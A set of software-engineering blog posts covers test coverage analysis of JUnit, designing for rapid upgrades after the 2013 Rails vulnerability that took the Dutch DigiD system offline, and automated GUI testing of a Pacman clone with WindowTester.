Coverage analysis is useful to managers: If you are a team lead, make sure you understand test coverage. Then use coverage analysis as a way to engage in discussion with your developers about their (test) code and the team’s test strategy.

Further reading

  1. Eric Bouwers, Joost Visser, and Arie van Deursen. Getting what you Measure: Four common pitfalls in using software metrics for project management. Communications of the ACM, 55(7): 54-59, 2012.
  2. Andrew Glover. In pursuit of code quality: Don’t be fooled by the coverage report. IBM Developer Works blog post, January, 2006.
  3. Martin Fowler. Test Coverage. http://martinfowler.com/bliki/TestCoverage.html, 17 April 2012.
  4. Alberto Savoia. How Much Unit Test Coverage Do You Need? – The Testivus Answer. Artima Forum, 2007. (Also listed as answer to the Stack Overflow question “What is reasonable code coverage and why?”).
  5. Brian Marick. How to misuse code coverage, 1999
  6. Cem Kaner. Software Negligence and Testing Coverage (Appendix A lists 101 coverage criteria). Proceedings of STAR 96
    (Fifth International Conference on Software Testing, Analysis, and Review), 1996.
  7. Zhu, Hall, May. Software Unit Test Coverage and Adequacy. ACM Computing Surveys, 1997.
  8. Andy Zaidman, Bart Van Rompaey, Arie van Deursen, and Serge Demeyer. Studying the co-evolution of production and test code in open source and industrial developer test processes through repository mining (open access). Empirical Software Engineering 16:325–364, 2011.
  9. Dimitrios Athanasiou. Constructing a Test Code Quality Model and Empirically Assessing its Relation to Issue Handling Performance (pdf). Master’s Thesis, Delft University of Technology, 2011.

© Arie van Deursen, 2013.
Image credits: Flickr.
Source featured image: flickr

Design for Upgradability and the Rails DigiD Outage

On January 9th, the Dutch DigiD system was taken offline for 9 hours. The reason was a vulnerability (CVE-2013-0155 and CVE-2013-0156) in the underlying Ruby on Rails framework. According to the vulnerability reports, it enables attackers to bypass authentication, inject SQL, perform a denial of service, or execute arbitrary code.

DigiD is a Dutch authentication system used by over 600 organizations, including the national tax administration. Over 9 million Dutch citizens have a DigiD account, which they must use for various interactions with the government, such as filing taxes electronically. The organization responsible for DigiD maintenance, Logius, decided to take DigiD offline when it heard about the vulnerability. It then updated the Rails system to a patched version. The total downtime of DigiD was about 9 hours (from 12:20 until 21:30). Luckily, it seems DigiD was never compromised.

The threat was real enough, though, as illustrated by the Bitcoin digital currency system: the Bitcoin currency exchange called Vircurex actually was compromised. According to Vircurex, it was able to “deploy fixes within five minutes after receiving the notification from the Rails security mailing list.”

To better understand the DigiD outage, I contacted spokesman Michiel Groeneveld from Logius. He stated that (1) applying the fix was relatively easy, and that (2) most of the down time was caused by “extensively testing” the new release.

Thus, the real lesson to be learned here is that speed of upgrading is crucial to reduce downtime (ensure high availability) in case a third-party component turns out to contain a security vulnerability. The software architect caring about both security and availability must apply design for upgradability (categorized under replaceability in ISO 25010).

Any upgrade can introduce incompatibilities. Even the patch for this Rails vulnerability introduced a regression. Design for upgradability is about dealing with such regressions. It involves:

  1. Isolation of dependencies on the external components, for example through the use of wrappers or aspects in order to reduce the impact of incompatibilities (see the sketch after this list).

  2. Dependency hygiene, ensuring the newest versions of external components are used as soon as they are available (which is good security policy anyway). This helps avoid the accumulation of incompatibilities, which may cause updates to take weeks rather than minutes (or even hours). Hot security fixes may even be unavailable for older versions: for Ruby on Rails, which is now in version 3.x, the most popular comment at the fix site was a telling “lots of love from people stuck on 2.3”.

  3. Test automation, in order to reduce the execution time of regression tests for the system working with the upgraded component. This will include end-to-end system tests, but can also include dedicated tests ensuring that the wrappers built meet the behavior expected from the component.

  4. Continuous deployment, ensuring that once the source code can deal with the upgraded library, the actual system can be deployed with a push on the button.
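
A minimal sketch of item 1 (the interface, the adapter, and the vendor API are all made up): hide the external component behind a small interface of your own, so that an upgrade that breaks the component’s API only affects a single adapter class.

// The interface the rest of the system depends on.
public interface PaymentGateway {
    void charge(String accountId, long amountInCents);
}

// The only class that touches the (hypothetical) third-party library directly.
// If an urgent security upgrade of that library changes its API,
// this adapter is the only place that needs to change.
public class ThirdPartyPaymentGateway implements PaymentGateway {

    private final com.example.vendor.PaymentClient client = new com.example.vendor.PaymentClient();

    @Override
    public void charge(String accountId, long amountInCents) {
        client.sendPayment(accountId, amountInCents);
    }
}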

None of these comes for free. In other words, the product owner should be willing to invest in these. It is the responsibility of the architect to make clear what the costs and benefits are, and what the risks are of not investing in isolation, dependency hygiene, test automation, and continuous deployment. In this explanation, the architect can point to additional benefits, such as better maintainability, but these may be harder to sell than security and availability.

This brings me to two research connections of this case.

The first relates to regression testing. A hot fix for a system that is down is a case where it actually matters how long the execution of an (automated) regression test suite takes: test execution time in this case equals down time. Intuitively, test cases covering functionality for which Rails is not even used, need not be executed. This is where the research area of selective regression testing comes in. The typical technique uses control flow analysis in order to reduce a large regression test suite given a particular change. This is classic software engineering research dating back to the 90s: For a representative article have a look at Rothermel and Harrold’s Safe, Efficient Regression Test Selection Technique.

Design for upgradability also relates to some of the research I’m involved in. What an architect caring about upgradability can do is estimate the anticipated upgrading costs of an external component. This could be based on a library’s “compatibility reputation”. But how can we create such a compatibility rating?

At the time of writing, we are working on various metrics that use a library’s release history in order to predict API stability. We are using the (huge) maven repository to learn about breaking changes in libraries in the wild, and we are investigating to what extent encapsulation practices are effective. With that in place, we hope to be able to provide decision support concerning the maintainability costs of using third party libraries.

For our first results, have a look at our ICSM 2012 paper on Measuring Library Stability Through Historical Version Analysis — for the rest, stay tuned, as there is more to come.

EDIT (February 4, 2013)

For a more detailed account of the impact of the Rails vulnerabilities, have a look at What The Rails Security Issue Means For Your Startup by Patrick McKenzie. The many (sometimes critical) comments on that post are also an indication of how hard upgrading is in practice (“How does this help me … when I have a multitude of apps running some Rails 1.x or 2.x version?”).

An interesting connection with API design is provided by Ned Batchelder, who suggests to rename .load and .safe_load to .dangerous_load and .load, respectively (in a Python setting in which similar security issues exist).

EDIT (April 4, 2013)

As another (separate) example of an urgent security fix, today (April 4, 2013), the PostgreSQL Global Development Group has released a security update to all current versions of the PostgreSQL database system. The most important security issue fixed in this release, CVE-2013-1899, makes it possible for a connection request containing a database name that begins with “-” to be crafted that can damage or destroy files within a server’s data directory.

Here again, all users of the affected versions are strongly urged to apply the update immediately, illustrating once more the need to be able to upgrade rapidly.

Line Coverage: Lessons from JUnit

In unit testing, achieving 100% statement coverage is not realistic. But what percentage would good testers get? Which cases are typically not included? Is it important to actually measure coverage?

To answer questions like these, I took a look at the test suite of JUnit itself. This is an interesting case, since it is created by some of the best developers around the world, who care a lot about testing. If they decide not to test a given case, what can we learn from that?

Coverage of JUnit as measured by Cobertura

Overall Coverage at First Sight

Applying Cobertura to the 600+ test cases of JUnit leads to the results shown above (I used the Maven-enabled version of JUnit 4.11). Overall, instruction coverage is almost 85%. In total, JUnit comprises around 13,000 lines of code and 15,000 lines of test code (both counted with wc). Thus, the test suite, which is larger than the framework itself, still leaves around 15% of the code untouched.

Covering Deprecated Code?

A first finding is that in JUnit the coverage of deprecated code tends to be lower. JUnit 4.11 contains 13 deprecated classes (more than 10% of the code base), which achieve only 65% line coverage.

JUnit includes another dozen or so deprecated methods spread over different classes. These tend to be small methods (just forwarding a call), which often are not tested.

Furthermore, JUnit 4.11 includes both the modern org.junit.* packages as well as the older junit.* packages from 3.8.x. These older packages constitute ~20% of the code base. Their coverage is 70%, whereas the newer packages have a coverage of almost 90%.

This lower coverage for deprecated code is somewhat surprising, since in a test-driven development process you would expect good coverage of code before it gets deprecated. The underlying mechanism may be that after deprecation there is no incentive to maintain the test cases: If I would issue a ticket to improve the test cases for a deprecated method on JUnit I suspect this issue would not get a high priority. (This calls for some repository mining research on deprecation and testing, in the spirit of our work on co-evolution of tests and code).

Another implication is that when configuring coverage tools, it may be worth excluding deprecated code from analysis. A coverage tool that can recognize @Deprecated tags would be ideal, but I am not aware of such a tool. If excluding deprecated code is impossible, an option is to adjust coverage warning thresholds in your continuous integration tools: For projects rich in deprecated code it will be harder to maintain high coverage percentages.

Ignoring deprecated code, the JUnit coverage is 93%.

An Untested Class!

In the non-deprecated code, there was one class not covered by any test: runners.model.NoGenericTypeParametersValidator. This class validates that @Theories are not applied to generic types (which are problematic due to type erasure).

I easily found the pull request introducing the validator about a year ago. Interestingly, the pull request included a test class clearly aimed at testing the new validator. What happened?

  • Tests in JUnit are executed via @Suites (see the sketch after this list). The new test class, however, was not added to any suite, and hence not executed.
  • Once added to the proper suite, it turned out the new tests failed: the new validation code was never actually invoked.
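
For readers less familiar with JUnit’s suite mechanism, this is roughly what inclusion in a suite looks like (the suite and test class names below are illustrative, not JUnit’s actual ones); a test class that is not listed in any suite is simply never executed:

import org.junit.runner.RunWith;
import org.junit.runners.Suite;
import org.junit.runners.Suite.SuiteClasses;

@RunWith(Suite.class)
@SuiteClasses({
    NoGenericTypeParametersValidatorTest.class, // forgetting this entry means the tests never run
    OtherValidatorTest.class
})
public class ValidationTestSuite {
}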

I posted a comment on the (already closed) pull request. The original developer responded quickly, and provided a fix for the code and the tests within a day.

Note that finding this issue through coverage thresholds in a continuous integration server may not be so easy. The pull request in question causes a 1% increase in code size, and a 1% decrease in coverage. Alerts based on thresholds need to be sensitive to small changes like these. (And, the current ant-based Cloudbees JUnit continuous integration server does not monitor coverage at all).

What I’d really want is continuous integration alerts based on coverage deltas for the files modified in the pull request only. I am, however, not aware of tools supporting this at the moment.

The Usual Suspects: 6%.

To understand the final 5-6% of uncovered code, I had a look at the remaining classes. For those, there was not a single method with more than 2 or 3 uncovered lines. For this uncovered code, various typical categories can be distinguished.

First, there is the category too simple to test. Here is an example from org.junit.Assume, in which an assumeTrue is turned into an assumeFalse by just adding a negation operator:

public static void assumeFalse(boolean b) {
  assumeTrue(!b);
}

Other instances of too simple to test include basic getters, or overrides for methods such as toString.

A special case of too simple to test is the empty method. These are typically used to provide (or override) default behavior in inheritance hierarchies:

/**
 * Override to set up your specific external resource.
 *
 * @throws Throwable if setup fails (which will disable {@code after})
 */
protected void before() throws Throwable {
    // do nothing
}

Another category is code that is dead by design. An example is a static only class, which need not be instantiated. It is good Java practice (adopted selectively in JUnit too) to make this explicit by declaring the constructor private:

/**
 * Protect constructor since it is a static only class
 */
protected Assert() {
}

In other cases, dead by design involves an assertion that certain situations will never occur. An example is Request.java:

catch (InitializationError e) {
  throw new RuntimeException(
    "Bug in saff's brain: " +
    "Suite constructor, called as above, should always complete");
}

This is similar to a default case in a switch statement that can never be reached.
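
An illustrative example (again my own, not JUnit code) of such an unreachable default case:

enum Direction { UP, DOWN, LEFT, RIGHT }

static String describe(Direction dir) {
    switch (dir) {
        case UP:    return "up";
        case DOWN:  return "down";
        case LEFT:  return "left";
        case RIGHT: return "right";
        default:    // dead by design: every enum constant is handled above
            throw new IllegalStateException("unknown direction: " + dir);
    }
}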

A final category consists of bad weather behavior that is unlikely to happen. This typically manifests itself in not explicitly testing that certain exceptions are caught:

try {
  ...
} catch (InitializationError e) {
  return new ErrorReportingRunner(null, e);
}

Here the catch clause is not covered by any test. Similar cases occur for example when raising an illegal argument exception if inputs do not meet simple validation criteria.
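
An illustrative sketch (mine, not JUnit code): the throw below is the kind of line that typically remains uncovered in an otherwise fully tested method.

static int percentage(int covered, int total) {
    if (total <= 0) {
        throw new IllegalArgumentException("total must be positive: " + total);  // bad weather, rarely tested
    }
    return (100 * covered) / total;
}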

EclEmma and JaCoCo

While all of the above is based on Cobertura, I started out using EclEmma/JaCoCo 0.6.0 in Eclipse for the coverage analysis. There were two (small) surprises.

First, merely enabling EclEmma code coverage caused the JUnit test suite to fail. The issue at hand is that in JUnit, test methods can be sorted according to different criteria. This involves reflection, and the test outcomes were influenced by the additional (synthetic) methods generated by JaCoCo. The solution is to configure JaCoCo so that instrumentation of certain classes is disabled, or to make the JUnit test suite more robust against instrumentation.

Second, JaCoCo does not report coverage of code raising exceptions. In contrast to Cobertura, JaCoCo does on-the-fly instrumentation using an agent attached to the Java class loader. Instructions in blocks that are not completed due to an exception are not reported as being covered.
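
A small example (mine, not JUnit code) of what this means in practice:

import org.junit.Assert;

// If the assertion fails, the AssertionError originates inside assertTrue,
// so the block is aborted before the next probe: JaCoCo then reports both
// lines as uncovered, even though the first one did execute. Cobertura,
// which counts hits per line, still marks it as covered.
static void checkPositive(int value) {
    String message = "value must be positive but was " + value;
    Assert.assertTrue(message, value > 0);
}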

As a consequence, JaCoCo is not suitable for exception-intensive code. JUnit, however, is rich in exceptions, for example in the various Assert methods. Consequently, the code coverage for JUnit reported by JaCoCo is around 3% lower than the coverage reported by Cobertura.

Lessons Learned

Applying line coverage to one of the best tested projects in the world, here is what we learned:

  1. Carefully analyzing coverage of code affected by your pull request is more useful than monitoring overall coverage trends against thresholds.
  2. It may be OK to lower your testing standards for deprecated code, but do not let this affect the rest of the code. If you use coverage thresholds on a continuous integration server, consider setting them differently for deprecated code.
  3. There is no reason to have methods with more than 2-3 untested lines of code.
  4. The usual suspects (simple code, dead code, bad weather behavior, …) correspond to around 5% of uncovered code.

In summary, should you monitor line coverage? Not all development teams do, and even in the JUnit project it does not seem to be a standard practice. However, if you want to be as good as the JUnit developers, there is no reason why your line coverage would be below 95%. And monitoring coverage is a simple first step to verify just that.

Automated GUI Testing with Google’s WindowTester

One of the topics that popped up a couple of times in our “test confession” interviews with Eclipse developers, is the tension between unit testing and GUI testing. Does an application with a thorough unit test suite require user interface testing? And what about the other way around? What does automated GUI testing add to standard unit testing? Is automated GUI testing a way to involve the end-users in the testing process?

[Screenshot: the WindowTester recorder]

In order to fully understand all arguments, I decided to play around a little with WindowTester, a capture-and-playback automated GUI testing tool made available by Google, with support for Swing and SWT.

My case study is JPacman, a Java implementation of a game similar to Pacman I use for teaching software testing. The plan of attack is simple: take the existing use cases, turn each into a click trail, record the trail, and generate a (JUnit-based) test suite.

My first use case is simple: enter and exit the game. To that end, I open the recorder, launch JPacman, and press the red "Record" button in Eclipse. Then I press the start button in the game, followed by the exit button, which quits the application. WindowTester then prompts for the place to save this interaction:

[Screenshot: saving the recorded test case]

After that, WindowTester generates the following JUnit test case:

import ...

public class StartAndExitUseCase extends UITestCaseSwing {

    public StartAndExitUseCase() {
        super(jpacman.controller.Pacman.class);
    }

    public void testStartAndExitUseCase() throws Exception {
        IUIContext ui = getUI();
        ui.click(new JButtonLocator("Start"));
        ui.click(new JButtonLocator("Exit"));
        ui.wait(new WindowDisposedCondition("JPacman"));
    }
}

The next use case requires me to make moves in several directions. Unfortunately, WindowTester can’t record arrow keys. To resolve this, I decide to modify JPacman to use good old vi navigation (‘hjkl’).

I then open JPacman to make moves in all directions. Unfortunately, I’m a bit slow, and I bump into one of the randomly moving monsters, after which I die.

This is a deeper issue: Parts of the application, in particular the random monsters, cannot be controlled via the GUI. Without such control, it is impossible to have test cases with reproducible results.

My solution is to create a slightly different version of Pacman, in which the monsters don’t move at all. In fact, I already had the code for this in my test harness, as I used such a version for unit testing.
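
The shape of that variant is roughly as follows; this is a sketch only, and MonsterController, createMonsterController, and tick are illustrative names rather than JPacman’s actual API:

// Sketch with illustrative names, not the actual JPacman API.
public class StillMonstersPacman extends Pacman {

    @Override
    protected MonsterController createMonsterController() {
        return new MonsterController() {
            @Override
            public void tick() {
                // Deliberately do nothing: the monsters stay put,
                // so the GUI scenarios become reproducible.
            }
        };
    }
}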

This works, and the result is a test case passing just fine:

public void testSimpleMove() throws Exception {
    IUIContext ui = getUI();
    ui.click(new JButtonLocator("Start"));
    ui.enterText("jlkhhh");
}

The test doesn’t assert much, though. Luckily, WindowTester has a mechanism to insert “hooks” while recording, prompting me for the name of the method to be called.

[Screenshot: WindowTester prompting for the name of the assertion hook method]

This results in the following code:

public void testSimpleMoveWithAsserts() throws Exception {
    IUIContext ui = getUI();
    ui.click(new JButtonLocator("Start"));
    ui.enterText("l");
    assertCorrectMoveToTheLeft();
    ui.enterText("j");
    assertCorrectMoveDown();
}

protected void assertCorrectMoveDown() throws Exception {
    // TODO Auto-generated method stub
}
...

WindowTester generates empty bodies for the two assert methods, leaving it to the developer to insert appropriate code. This raises two issues.

The first is that the natural way (at least for me as a tester) to verify that a move down was carried out correctly is to ask the appropriate objects for the player’s position. From the GUI, however, I don’t have access to these objects. My workaround is to adjust Pacman’s “main” method to make the underlying model available through a static reference. This results in the following code:

protected void assertCorrectMoveDown() {
    Pacman pm = SimplePacman.instance();
    assertEquals(1, pm.getEngine().getPlayer().getLastDy());
}
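
The static reference itself amounts to a few lines in the adjusted main method. The sketch below is one possible arrangement and is mine: only SimplePacman.instance() appears in the test code above, the other names are illustrative.

// Sketch only: expose the game model created in main via a static accessor.
public class SimplePacman {

    private static Pacman theGame;

    public static void main(String[] args) {
        theGame = new Pacman();   // illustrative: however the game is normally constructed
        theGame.start();          // illustrative start-up call
    }

    /** The running game, so that GUI tests can query the underlying model. */
    public static Pacman instance() {
        return theGame;
    }
}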

Writing such an assertion requires good knowledge of the underlying API, and a bit of luck that the API exposes a method to witness the desired effect.

My next use case involves a hungry Pacman consuming a dot, which earns the player 10 points. Doing this in a way similar to the previous use case is simple enough. But would it also be possible to assert that the proper number of points is displayed in the GUI? This requires getting hold of the appropriate JTextField and checking its content before and after eating a dot.

To support this, WindowTester offers a number of widget locators. An example is the locator used above to find a JButton labeled with “Start”. Other types of locators make use of patterns, the hierarchical position in the GUI, or a unique name that a developer can give to widgets. I use this latter option, allowing me to retrieve the points displayed as follows:

private int getPointsDisplayed() throws WidgetSearchException {
    WidgetReference<JTextField> wrf = 
        (WidgetReference<JTextField>) 
        getUI().find(new NamedWidgetLocator("jpacman.points"));
    JTextField pointsField = (JTextField) wrf.getWidget();
    return Integer.parseInt(pointsField.getText());
}

Thus, I can test if the points actually displayed are correct.
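
For the name-based lookup to work, the GUI code has to assign that name to the widget, which in Swing is done with Component.setName. A sketch (the class and method around it are mine):

import javax.swing.JTextField;

public class ScorePanelSketch {

    JTextField createPointsField() {
        JTextField pointsField = new JTextField("0", 5);
        pointsField.setName("jpacman.points");   // the name NamedWidgetLocator searches for
        pointsField.setEditable(false);
        return pointsField;
    }
}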

The remaining use cases can be handled in a similar way. Some use cases require moving monsters, for which having access to the GUI alone is not enough. Another use case, winning the game, would require a lot of clever moves on the regular board: instead I create a custom small and simple board, in which winning is easy.

I make less and less use of the recording capabilities of WindowTester: instead, I program directly against its API. This also makes the test cases easier to maintain: I have a “setUp” for pushing the “Start” button, a “tearDown” for pushing “Exit”, and I can make use of other JUnit best practices. Moreover, it allows me to create a small layer of methods permitting more abstract test cases, such as the method above for obtaining the points actually displayed.
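
A sketch of that shared fixture, assuming UITestCaseSwing follows the usual JUnit 3 setUp and tearDown protocol (the class name is mine):

public abstract class JPacmanUITestCase extends UITestCaseSwing {

    protected JPacmanUITestCase() {
        super(jpacman.controller.Pacman.class);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
        getUI().click(new JButtonLocator("Start"));  // every scenario starts a game
    }

    @Override
    protected void tearDown() throws Exception {
        getUI().click(new JButtonLocator("Exit"));   // and ends by leaving it
        super.tearDown();
    }
}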

Are the resulting test cases useful? I recently changed some of the GUI logic, turning a complex if-then-else to handle keyboard events into a much cleaner switch statement (inspired by a warning PMD was giving me). All unit test cases passed fine. I almost committed, but then decided to run the GUI test suite as well. It failed. I first blamed WindowTester, but then I realized it was my own fault: I had forgotten some breaks in my switch and the events were not handled correctly. The GUI test suite found a fault my unit test suite had not found.
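
For illustration, the fault had roughly the following shape (a hypothetical reconstruction, not the actual JPacman code):

import java.awt.event.KeyEvent;

// Hypothetical illustration: omit the first break and a 'j' key press moves
// the player down and then left as well, a fall-through the unit tests missed
// but the GUI test suite caught.
void handleKey(int keyCode, Player player) {
    switch (keyCode) {
        case KeyEvent.VK_J:
            player.moveDown();
            break;   // the forgotten break
        case KeyEvent.VK_H:
            player.moveLeft();
            break;
        default:
            break;   // ignore other keys
    }
}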

In summary, automated GUI testing is a replacement neither for unit testing nor for acceptance testing. It is a useful tool for covering the GUI logic of your application. The recording capabilities can be helpful to try out certain scenarios. In the end, however, an explicitly programmed test suite, making use of the GUI framework’s API, seems easier to maintain. In this way, JUnit best practices related to test suite organization, as well as the application’s observability and controllability, can be applied directly to your GUI test suite.


(This post originally appeared in February 2011 as “Swinging Test Suites with WindowTester” on the Eclipse Study blog.)